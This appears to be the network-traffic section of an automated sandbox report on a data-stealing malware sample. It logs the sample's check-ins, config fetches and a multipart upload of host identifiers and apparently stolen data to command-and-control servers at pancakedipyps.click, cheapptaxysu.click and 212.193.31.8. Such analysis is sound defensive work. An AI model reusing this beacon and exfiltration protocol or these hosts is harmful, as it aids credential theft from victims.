Dec 22, 2024 02:18:47.524837017 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49806	172.67.209.202	443	7820	C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:29 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: pancakedipyps.click
2024-12-22 01:16:29 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-22 01:16:29 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4jjlu1kfrsceanfcqsdk025m76; expires=Wed, 16 Apr 2025 19:03:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdxlW%2BS%2BddZHKIibNcR3jFwfeCFRR2nhv3qNd%2Bgmaedx2nHU8bVOgxLuApZBu0grYd4lwV91LNnaJ0dWS%2BIJKkZnUopmGZBrZAwf%2FcK4SBx%2Bf56IVd9xZdoyKTYLDnURPeXgemAE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c444bafd043af-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2217&min_rtt=2195&rtt_var=867&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1230509&cwnd=230&unsent_bytes=0&cid=74591629c901093a&ts=762&x=0"
2024-12-22 01:16:29 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-22 01:16:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49814	172.67.209.202	443	7820	C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:31 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 46 Host: pancakedipyps.click
2024-12-22 01:16:31 UTC	46	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
2024-12-22 01:16:32 UTC	1125	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p499ha4rssehb5vae9dt813ad5; expires=Wed, 16 Apr 2025 19:03:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JYmer%2BGrD3sDwtBCrFfm%2FrIoKVyYZwLZbbnSWShNDsKgsjHQ0zdu4xAbsz6PT1lz%2BvDKRRhH6kkNKJ4etdfBJnlLU8ekGdHDcIYofO7BcqiZrN7ZB6d2DJhHRYfFB01FmzasHjb9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c445b3a06c411-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1487&rtt_var=568&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=949&delivery_rate=1907250&cwnd=224&unsent_bytes=0&cid=02058663a3d7d1bb&ts=783&x=0"
2024-12-22 01:16:32 UTC	244	IN	Data Raw: 63 35 30 0d 0a 6f 73 50 42 68 5a 6d 50 51 71 66 56 46 36 43 37 75 31 61 42 52 6a 6d 77 35 46 4c 51 5a 69 62 4c 78 6d 4b 6f 4d 63 56 66 54 4f 58 5a 34 62 65 6e 6f 37 74 75 68 61 5a 79 67 6f 48 50 4a 50 51 6a 46 5a 4b 46 4e 76 4a 63 51 4b 71 71 45 63 30 64 35 79 6b 68 78 35 69 6c 6f 4f 6e 71 36 6d 36 46 73 47 2b 43 67 65 41 74 6f 79 4e 58 6b 74 35 77 74 51 78 45 71 71 6f 41 79 56 71 71 4c 79 43 47 79 71 2b 6d 37 66 7a 73 4a 73 61 35 65 73 58 65 33 6a 66 72 4b 46 44 64 6a 44 2f 79 53 67 53 75 76 45 43 53 45 34 67 36 4f 49 54 76 6f 72 4c 75 75 2f 4a 75 33 50 64 79 7a 70 6d 42 64 4f 41 6a 57 39 79 43 4e 72 73 4f 54 71 4f 69 41 63 78 62 74 54 59 71 6a 63 71 68 70 65 7a 32 35 54 4c 4c 73 33 33 4f 32 4e 51 33 6f 32 6f 62 31 5a 35 Data Ascii: c50osPBhZmPQqfVF6C7u1aBRjmw5FLQZibLxmKoMcVfTOXZ4beno7tuhaZygoHPJPQjFZKFNvJcQKqqEc0d5ykhx5iloOnq6m6FsG+CgeAtoyNXkt5wtQxEqqoAyVqqLyCGyq+m7fzsJsa5esXe3jfrKFDdjD/ySgSuvECSE4g6OITvorLuu/Ju3PdyzpmBdOAjW9yCNrsOTqOiAcxbtTYqjcqhpez25TLLs33O2NQ3o2ob1Z5
2024-12-22 01:16:32 UTC	1369	IN	Data Raw: 77 36 6b 51 58 6d 36 63 52 32 30 61 71 4c 53 6a 48 33 2b 2b 36 70 2f 7a 68 59 4a 33 33 66 63 37 58 33 44 66 73 49 31 72 53 6c 44 2b 79 42 30 79 68 6f 41 72 46 58 4b 67 7a 4a 49 44 49 71 4b 54 6f 2f 4f 55 6d 79 72 51 31 6a 4a 6e 65 4c 4b 4e 38 47 2f 4b 57 4d 37 45 51 53 62 6a 6b 48 34 52 4b 35 7a 6f 69 78 35 6a 68 70 65 6e 36 34 43 44 58 76 33 37 4a 33 4d 73 2f 36 69 6c 57 30 6f 73 36 76 51 64 45 72 71 34 4b 78 56 6d 6a 4d 43 4f 42 77 4b 48 6a 71 62 76 71 4f 49 58 76 4e 65 48 63 79 54 50 76 4d 68 6e 6f 78 69 2f 38 48 51 53 75 71 45 43 53 45 36 38 34 4c 59 54 4c 72 71 44 76 38 50 38 67 31 37 46 34 78 38 76 66 4d 65 30 75 57 4d 43 4d 50 72 51 48 54 61 4b 74 42 63 31 58 35 33 4e 75 67 4e 6a 68 2b 36 66 61 34 43 76 4a 76 57 4c 43 6d 63 5a 36 2b 6d 52 63 33 73 Data Ascii: w6kQXm6cR20aqLSjH3++6p/zhYJ33fc7X3DfsI1rSlD+yB0yhoArFXKgzJIDIqKTo/OUmyrQ1jJneLKN8G/KWM7EQSbjkH4RK5zoix5jhpen64CDXv37J3Ms/6ilW0os6vQdErq4KxVmjMCOBwKHjqbvqOIXvNeHcyTPvMhnoxi/8HQSuqECSE684LYTLrqDv8P8g17F4x8vfMe0uWMCMPrQHTaKtBc1X53NugNjh+6fa4CvJvWLCmcZ6+mRc3s
2024-12-22 01:16:32 UTC	1369	IN	Data Raw: 53 61 58 6b 54 6f 70 55 76 33 31 32 78 2b 71 69 74 2b 54 78 72 78 58 47 75 58 76 46 7a 35 6b 72 72 54 30 62 31 59 70 77 36 6b 52 4a 71 4b 77 47 32 46 79 71 50 69 43 4a 7a 36 53 73 37 2f 76 74 4c 63 43 7a 66 73 6e 61 31 44 44 78 4c 6c 76 61 67 7a 47 34 44 67 54 6e 35 41 66 53 45 2f 39 39 48 35 44 4c 34 35 62 6b 39 65 4d 6e 30 2f 64 71 6a 4d 43 5a 4d 2b 39 6b 41 35 4b 4c 4f 4c 63 42 53 36 69 75 44 73 39 5a 71 7a 55 67 68 4e 4b 75 70 2b 66 33 35 53 72 49 75 58 48 4b 30 4e 49 2f 35 53 52 61 32 4d 5a 2b 38 67 4e 63 36 66 78 41 2f 6c 53 72 4d 43 48 46 39 61 4b 74 36 66 7a 37 59 4e 72 35 62 49 4c 65 31 58 53 37 5a 46 66 62 68 6a 75 34 41 45 53 75 71 51 58 4a 56 4b 51 77 4b 59 33 4f 70 71 66 72 38 75 41 6d 78 62 42 78 78 38 76 63 50 65 38 6f 47 35 7a 47 4e 36 70 Data Ascii: SaXkTopUv312x+qit+TxrxXGuXvFz5krrT0b1Ypw6kRJqKwG2FyqPiCJz6Ss7/vtLcCzfsna1DDxLlvagzG4DgTn5AfSE/99H5DL45bk9eMn0/dqjMCZM+9kA5KLOLcBS6iuDs9ZqzUghNKup+f35SrIuXHK0NI/5SRa2MZ+8gNc6fxA/lSrMCHF9aKt6fz7YNr5bILe1XS7ZFfbhju4AESuqQXJVKQwKY3Opqfr8uAmxbBxx8vcPe8oG5zGN6p
2024-12-22 01:16:32 UTC	177	IN	Data Raw: 41 66 47 45 2f 39 39 4a 34 37 53 72 36 33 75 39 75 73 6f 77 72 6c 34 79 64 2f 53 4d 2b 51 69 56 74 71 4c 4e 62 45 46 51 4b 4f 32 41 38 46 5a 71 6a 64 75 79 59 43 6d 75 36 65 6a 72 51 66 4a 6e 6d 58 5a 79 38 39 30 2f 47 70 43 6b 6f 45 38 38 6c 77 45 71 71 73 4a 78 56 75 76 4d 69 47 44 7a 71 65 6c 36 76 37 69 4b 74 65 2f 65 38 2f 53 31 6a 2f 78 4a 46 62 57 69 6a 53 36 44 30 37 70 36 6b 44 4e 53 2b 64 6c 62 72 4c 4e 72 71 50 6b 37 61 30 2f 69 36 34 31 78 64 57 5a 62 4b 4d 6f 56 64 4b 4a 50 4c 34 50 54 4b 69 6f 44 73 31 57 0d 0a Data Ascii: AfGE/99J47Sr63u9usowrl4yd/SM+QiVtqLNbEFQKO2A8FZqjduyYCmu6ejrQfJnmXZy890/GpCkoE88lwEqqsJxVuvMiGDzqel6v7iKte/e8/S1j/xJFbWijS6D07p6kDNS+dlbrLNrqPk7a0/i641xdWZbKMoVdKJPL4PTKioDs1W
2024-12-22 01:16:32 UTC	1369	IN	Data Raw: 33 63 63 63 0d 0a 72 6a 55 6d 6c 63 47 6c 71 2b 62 31 34 69 48 42 73 6e 44 47 33 74 30 79 37 47 51 56 6b 6f 45 6f 38 6c 77 45 68 6f 4d 31 69 48 4b 64 66 54 48 4a 32 65 47 6b 36 37 75 31 59 4d 6d 30 65 63 72 57 33 7a 33 76 4c 6c 4c 5a 69 6a 75 32 43 45 32 73 6f 67 48 50 56 71 59 35 49 6f 33 47 6f 71 44 6f 39 4f 49 6f 68 66 6b 31 78 63 47 5a 62 4b 4d 42 54 4e 6d 49 4e 76 49 62 43 72 44 6b 42 38 59 54 2f 33 30 69 6a 73 61 6e 70 75 76 36 36 79 6a 41 76 33 48 44 33 39 38 33 37 43 42 65 30 34 6b 30 76 67 70 4f 71 4b 55 4d 77 56 79 73 4f 47 37 4a 67 4b 61 37 70 36 4f 74 45 63 61 68 59 74 4c 56 6d 53 75 74 50 52 76 56 69 6e 44 71 52 45 57 37 72 67 72 45 56 71 67 34 4c 59 6a 48 72 4b 58 72 38 65 51 6f 77 37 68 38 30 4e 72 56 4f 75 51 71 56 39 79 4c 4f 72 45 4a 42 Data Ascii: 3cccrjUmlcGlq+b14iHBsnDG3t0y7GQVkoEo8lwEhoM1iHKdfTHJ2eGk67u1YMm0ecrW3z3vLlLZiju2CE2sogHPVqY5Io3GoqDo9OIohfk1xcGZbKMBTNmINvIbCrDkB8YT/30ijsanpuv66yjAv3HD39837CBe04k0vgpOqKUMwVysOG7JgKa7p6OtEcahYtLVmSutPRvVinDqREW7rgrEVqg4LYjHrKXr8eQow7h80NrVOuQqV9yLOrEJB
2024-12-22 01:16:32 UTC	1369	IN	Data Raw: 41 56 4b 41 32 4a 6f 7a 50 70 37 48 72 39 66 38 6c 31 36 55 31 6a 4a 6e 65 4c 4b 4e 38 47 2b 53 42 49 4b 49 48 42 70 69 79 41 39 78 59 71 6a 46 75 6d 49 36 34 34 2b 44 33 72 58 69 46 73 58 72 4c 32 74 59 31 36 69 68 57 31 34 38 31 73 77 4a 41 6f 36 34 41 7a 46 57 6d 4f 43 53 45 77 61 75 71 34 50 50 71 49 39 66 33 4f 34 4c 65 77 58 53 37 5a 48 4c 56 6c 44 36 69 52 46 76 6e 76 55 44 4e 58 2b 64 6c 62 6f 50 4b 72 71 66 67 39 2b 73 6c 77 37 70 30 7a 64 6a 5a 4f 2b 63 76 55 74 53 48 50 62 63 4a 51 4c 75 75 43 38 56 66 72 6a 45 6a 78 34 37 68 70 50 2b 37 74 57 44 30 75 6e 76 4d 33 73 39 30 2f 47 70 43 6b 6f 45 38 38 6c 77 45 71 4b 67 50 79 56 79 6b 50 69 2b 4e 30 72 4f 76 37 76 50 6f 4c 4d 36 35 63 39 44 66 31 6a 33 67 4a 31 4c 56 6a 6a 79 34 42 30 50 70 36 6b Data Ascii: AVKA2JozPp7Hr9f8l16U1jJneLKN8G+SBIKIHBpiyA9xYqjFumI644+D3rXiFsXrL2tY16ihW1481swJAo64AzFWmOCSEwauq4PPqI9f3O4LewXS7ZHLVlD6iRFvnvUDNX+dlboPKrqfg9+slw7p0zdjZO+cvUtSHPbcJQLuuC8VfrjEjx47hpP+7tWD0unvM3s90/GpCkoE88lwEqKgPyVykPi+N0rOv7vPoLM65c9Df1j3gJ1LVjjy4B0Pp6k
2024-12-22 01:16:32 UTC	1369	IN	Data Raw: 4b 69 6d 59 6a 72 6a 6a 34 50 65 74 65 49 57 78 66 4d 54 65 33 7a 72 78 49 56 33 64 69 54 6d 37 41 45 79 71 70 41 54 4f 56 4b 49 2b 49 6f 7a 48 6f 71 7a 6a 38 75 4d 70 79 76 63 37 67 74 37 42 64 4c 74 6b 65 73 6d 46 50 4c 39 45 57 2b 65 39 51 4d 31 66 35 32 56 75 69 38 36 6b 6f 2b 33 39 36 53 58 44 76 58 44 43 30 74 6f 37 35 79 4a 66 33 59 59 37 75 77 56 43 72 4b 34 4c 7a 46 36 6b 4f 79 6a 48 6a 75 47 6b 2f 37 75 31 59 4f 57 73 65 4d 37 65 6d 53 75 74 50 52 76 56 69 6e 44 71 52 45 2b 6c 6f 41 66 4b 58 71 51 31 4b 34 50 4b 70 4b 50 76 36 65 55 67 77 71 56 6e 77 74 44 63 4f 4f 41 6b 58 39 53 50 4e 72 45 41 42 4f 66 6b 42 39 49 54 2f 33 30 44 69 38 65 49 70 50 79 37 38 6d 37 63 39 33 4c 4f 6d 59 46 30 34 69 39 52 33 59 73 7a 74 41 64 50 72 4b 34 42 7a 56 75 Data Ascii: KimYjrjj4PeteIWxfMTe3zrxIV3diTm7AEyqpATOVKI+IozHoqzj8uMpyvc7gt7BdLtkesmFPL9EW+e9QM1f52Vui86ko+396SXDvXDC0to75yJf3YY7uwVCrK4LzF6kOyjHjuGk/7u1YOWseM7emSutPRvVinDqRE+loAfKXqQ1K4PKpKPv6eUgwqVnwtDcOOAkX9SPNrEABOfkB9IT/30Di8eIpPy78m7c93LOmYF04i9R3YsztAdPrK4BzVu
2024-12-22 01:16:32 UTC	1369	IN	Data Raw: 35 4c 76 34 2f 57 37 74 57 43 43 74 47 66 51 33 39 6f 69 34 47 4e 6c 37 4b 45 6d 75 41 4e 55 72 72 4d 50 69 68 33 6e 4d 6d 37 66 2b 65 47 71 34 4f 44 38 4e 73 69 6e 63 6f 4c 6d 6c 33 54 37 5a 41 4f 53 73 7a 4f 38 43 6b 4f 2f 74 55 33 74 52 61 30 36 50 6f 44 58 72 75 4f 70 75 2b 74 67 6e 65 51 37 67 74 33 49 64 4c 74 30 43 59 6e 54 59 2b 56 55 46 72 62 71 47 59 70 46 35 32 56 38 79 59 43 7a 34 37 2b 37 71 69 50 58 70 58 50 42 7a 39 70 7a 33 52 70 38 79 49 73 32 70 52 56 36 6c 36 4d 61 78 31 57 77 4c 47 4b 53 77 36 2b 74 34 4f 32 74 62 6f 57 34 4e 5a 72 67 6d 58 79 6a 47 78 57 53 6e 6e 44 71 52 48 47 71 71 67 37 4e 52 62 5a 77 43 5a 33 4e 70 37 54 32 75 36 4e 67 77 2f 63 74 6b 70 65 5a 4d 50 4a 6b 41 34 4c 55 61 2b 64 58 45 2f 6e 32 48 34 52 4b 35 79 74 75 Data Ascii: 5Lv4/W7tWCCtGfQ39oi4GNl7KEmuANUrrMPih3nMm7f+eGq4OD8NsincoLml3T7ZAOSszO8CkO/tU3tRa06PoDXruOpu+tgneQ7gt3IdLt0CYnTY+VUFrbqGYpF52V8yYCz47+7qiPXpXPBz9pz3Rp8yIs2pRV6l6Max1WwLGKSw6+t4O2tboW4NZrgmXyjGxWSnnDqRHGqqg7NRbZwCZ3Np7T2u6Ngw/ctkpeZMPJkA4LUa+dXE/n2H4RK5ytu
2024-12-22 01:16:32 UTC	1369	IN	Data Raw: 58 32 75 36 4e 67 79 76 63 74 2b 35 6d 52 64 4e 78 71 47 38 72 47 61 50 49 78 52 36 65 71 42 39 78 43 36 68 6f 67 67 4d 47 33 73 2f 44 30 72 57 36 46 73 54 57 61 69 35 64 30 35 7a 55 62 69 74 5a 69 36 56 45 58 2f 76 52 53 31 52 32 2b 66 54 6a 48 6d 50 50 74 70 2b 6d 74 65 49 58 77 64 74 44 4c 33 7a 66 31 4a 78 7a 73 75 42 65 38 41 30 57 2f 74 42 66 46 48 49 6b 4c 44 37 6e 2b 74 4b 44 70 39 65 6f 32 31 50 63 37 67 74 61 5a 62 4e 70 6b 45 35 4b 35 66 76 49 63 42 50 48 6b 4e 63 6c 64 71 54 6f 34 6c 6f 32 47 72 65 44 36 2b 7a 44 53 75 44 72 73 37 2f 68 30 72 57 52 64 6b 74 35 69 2f 45 52 41 75 4f 52 59 6d 67 48 38 61 48 33 51 6b 50 4f 38 71 65 4b 74 4e 6f 58 76 4a 34 79 5a 79 33 53 37 5a 42 7a 52 6c 43 4b 30 42 31 4b 71 34 7a 37 30 64 4b 6b 36 4c 35 48 51 72 Data Ascii: X2u6Ngyvct+5mRdNxqG8rGaPIxR6eqB9xC6hoggMG3s/D0rW6FsTWai5d05zUbitZi6VEX/vRS1R2+fTjHmPPtp+mteIXwdtDL3zf1JxzsuBe8A0W/tBfFHIkLD7n+tKDp9eo21Pc7gtaZbNpkE5K5fvIcBPHkNcldqTo4lo2GreD6+zDSuDrs7/h0rWRdkt5i/ERAuORYmgH8aH3QkPO8qeKtNoXvJ4yZy3S7ZBzRlCK0B1Kq4z70dKk6L5HQr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49822	172.67.209.202	443	7820	C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:35 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4U8D67529 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18108 Host: pancakedipyps.click
2024-12-22 01:16:35 UTC	15331	OUT	Data Raw: 2d 2d 34 55 38 44 36 37 35 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 55 38 44 36 37 35 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 55 38 44 36 37 35 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 34 55 38 44 36 37 35 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --4U8D67529Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--4U8D67529Content-Disposition: form-data; name="pid"2--4U8D67529Content-Disposition: form-data; name="lid"FATE99--test--4U8D67529Content-Dispo
2024-12-22 01:16:35 UTC	2777	OUT	Data Raw: 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
2024-12-22 01:16:36 UTC	1130	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ob2f8n3m8gq5lq0rbf1squ30dh; expires=Wed, 16 Apr 2025 19:03:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KmgQELQzNbVFSe4LGNIrCIcOCmYbGGD%2FYAasTfNkRHS8f%2BcVD%2Fe97ghsw9uq3qP63fo094tm0N8l2CnlhsJiAM2oPByRhMeja8Yde4lgF1OWjps2i0uLgc2KRynCNzNwtbuG5Te"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44719e3832dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1798&rtt_var=689&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2849&recv_bytes=19064&delivery_rate=1569892&cwnd=241&unsent_bytes=0&cid=e7789fe0d7f0f50a&ts=1155&x=0"
2024-12-22 01:16:36 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:16:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49823	104.21.67.146	443	5040	C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:35 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cheapptaxysu.click
2024-12-22 01:16:35 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-22 01:16:36 UTC	566	IN	HTTP/1.1 403 Forbidden Date: Sun, 22 Dec 2024 01:16:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlDZeF9DSsj%2Fah99ZkjP8hZIUWe5uI49e4RkUM5kg%2BD2%2Fhbyj2xSFtBXOyVLqtRH%2BlxjFeJe91Urc6S0cUS%2Fis30X9e8l1t6U%2FzeUl4z9RJDyZJ4CnR6TpNjJB%2FizkzD7gTGMX0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4474fce34328-EWR
2024-12-22 01:16:36 UTC	803	IN	Data Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-12-22 01:16:36 UTC	1369	IN	Data Raw: 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c Data Ascii: cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getEl
